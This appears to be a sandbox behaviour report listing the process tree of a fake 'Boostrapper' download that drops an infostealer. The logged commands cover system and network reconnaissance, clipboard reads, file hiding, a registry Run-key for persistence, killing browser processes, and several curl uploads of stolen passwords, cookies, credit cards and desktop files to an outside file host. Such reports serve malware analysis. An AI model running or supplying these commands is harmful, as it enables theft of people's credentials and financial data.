  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c4146f8,0x7ffe3c414708,0x7ffe3c414718
  2⤵
  PID:4252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:2728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2516 /prefetch:8
  2⤵
  PID:3192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2912 /prefetch:1
  2⤵
  PID:2588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:1
  2⤵
  PID:4388
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
  2⤵
  PID:404
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
  2⤵
  PID:1160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:4324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5272 /prefetch:8
  2⤵
  PID:3548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
  2⤵
  PID:4384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6392 /prefetch:8
  2⤵
  PID:224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
  2⤵
  PID:4088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
  2⤵
  PID:1596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
  2⤵
  PID:3960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1360 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,6331649473243551540,8167505022420682032,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5792 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4532
- C:\Users\Admin\Downloads\Boostrapper.exe
  "C:\Users\Admin\Downloads\Boostrapper.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3952
- - C:\Users\Admin\AppData\Local\Temp\BOOSTEAPPER.EXE
    "C:\Users\Admin\AppData\Local\Temp\BOOSTEAPPER.EXE"
    3⤵
    - Executes dropped EXE
    PID:1540
  - - C:\Users\Admin\AppData\Local\Temp\BOOSTEAPPER.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOOSTEAPPER.EXE"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2168
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:1724
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:232
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:2460
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        5⤵
        
        PID:4800
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2204
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        5⤵
        
        PID:5108
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:4224
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        5⤵
        
        PID:4280
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        6⤵
        
        PID:3236
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:396
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:2088
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:2264
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:516
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
        5⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:2452
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3236
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
        6⤵
        Views/modifies file attributes
        
        PID:1088
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"
        5⤵
        
        PID:4532
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f
        6⤵
        Adds Run key to start application
        
        PID:2912
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:1492
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:2452
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4744"
        5⤵
        
        PID:4464
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4744
        6⤵
        Kills process with taskkill
        
        PID:3556
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4252"
        5⤵
        
        PID:4348
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4252
        6⤵
        Kills process with taskkill
        
        PID:2204
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2728"
        5⤵
        
        PID:3232
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2728
        6⤵
        Kills process with taskkill
        
        PID:2368
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1516"
        5⤵
        
        PID:1464
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1516
        6⤵
        Kills process with taskkill
        
        PID:2916
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3192"
        5⤵
        
        PID:1456
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3192
        6⤵
        Kills process with taskkill
        
        PID:4076
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4388"
        5⤵
        
        PID:396
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4388
        6⤵
        Kills process with taskkill
        
        PID:5104
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4088"
        5⤵
        
        PID:4908
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4088
        6⤵
        Kills process with taskkill
        
        PID:4064
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1596"
        5⤵
        
        PID:3048
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1596
        6⤵
        Kills process with taskkill
        
        PID:4688
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3960"
        5⤵
        
        PID:4664
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3960
        6⤵
        Kills process with taskkill
        
        PID:684
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        5⤵
        
        PID:2456
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        6⤵
        
        PID:2024
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:2736
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        5⤵
        
        PID:2856
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        6⤵
        
        PID:2144
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:4752
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:1672
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:4348
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:1932
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        6⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        5⤵
        Network Service Discovery
        
        PID:4312
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:3792
      - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        6⤵
        
        PID:1008
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        6⤵
        Collects information from the system
        
        PID:2696
      - C:\Windows\system32\net.exe
        
        net user
        6⤵
        
        PID:4496
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        7⤵
        
        PID:4856
      - C:\Windows\system32\query.exe
        
        query user
        6⤵
        
        PID:5104
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        7⤵
        
        PID:396
      - C:\Windows\system32\net.exe
        
        net localgroup
        6⤵
        
        PID:3544
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        7⤵
        
        PID:4264
      - C:\Windows\system32\net.exe
        
        net localgroup administrators
        6⤵
        
        PID:3732
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        7⤵
        
        PID:224
      - C:\Windows\system32\net.exe
        
        net user guest
        6⤵
        
        PID:2796
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        7⤵
        
        PID:4532
      - C:\Windows\system32\net.exe
        
        net user administrator
        6⤵
        
        PID:4660
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        7⤵
        
        PID:4872
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        6⤵
        
        PID:1700
      - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        6⤵
        Enumerates processes with tasklist
        
        PID:1780
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        6⤵
        Gathers network information
        
        PID:4104
      - C:\Windows\system32\ROUTE.EXE
        
        route print
        6⤵
        
        PID:3048
      - C:\Windows\system32\ARP.EXE
        
        arp -a
        6⤵
        Network Service Discovery
        
        PID:3056
      - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        6⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:640
      - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        6⤵
        Launches sc.exe
        
        PID:4408
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1572
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2284
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5016
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4540
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:4832
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:4648
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:372
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:436
- - C:\Users\Admin\AppData\Local\Temp\WAVEBOOSTRAPPER.EXE
    "C:\Users\Admin\AppData\Local\Temp\WAVEBOOSTRAPPER.EXE"
    3⤵
    - Executes dropped EXE
    PID:1236
  - - C:\Users\Admin\AppData\Local\Temp\WAVEBOOSTRAPPER.EXE
      "C:\Users\Admin\AppData\Local\Temp\WAVEBOOSTRAPPER.EXE"
      4⤵
      Drops startup file
      Executes dropped EXE
      Loads dropped DLL
      PID:3524
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:4856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:2276
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:4780
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:1428
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:3948
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:4060
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:3648
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:5048
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:2160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:1408
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:3852
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:4356
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:2784
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupSend.tiff" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:1424
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Desktop/BackupSend.tiff" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:2420
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/InvokeBackup.mpv2" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:2868
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Desktop/InvokeBackup.mpv2" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:4652

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:436

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2716

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3016

C:\Users\Admin\AppData\Local\Temp\WAVEBOOSTRAPPER.EXE
"C:\Users\Admin\AppData\Local\Temp\WAVEBOOSTRAPPER.EXE"
1⤵
- Executes dropped EXE
PID:936
- C:\Users\Admin\AppData\Local\Temp\WAVEBOOSTRAPPER.EXE
  "C:\Users\Admin\AppData\Local\Temp\WAVEBOOSTRAPPER.EXE"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"
    3⤵
    PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:4300
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:3396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:4428
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:4216
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:1952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:2132
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:1184
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:3852
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupSend.tiff" https://store4.gofile.io/uploadFile"
    3⤵
    PID:1636
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/BackupSend.tiff" https://store4.gofile.io/uploadFile
      4⤵
      PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/InvokeBackup.mpv2" https://store4.gofile.io/uploadFile"
    3⤵
    PID:2944
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/InvokeBackup.mpv2" https://store4.gofile.io/uploadFile
      4⤵
      PID:1156

C:\Users\Admin\AppData\Local\Temp\BOOSTEAPPER.EXE
"C:\Users\Admin\AppData\Local\Temp\BOOSTEAPPER.EXE"
1⤵
- Executes dropped EXE
PID:4252
- C:\Users\Admin\AppData\Local\Temp\BOOSTEAPPER.EXE
  "C:\Users\Admin\AppData\Local\Temp\BOOSTEAPPER.EXE"
  2⤵
  - Executes dropped EXE
  PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"
    3⤵
    PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
    3⤵
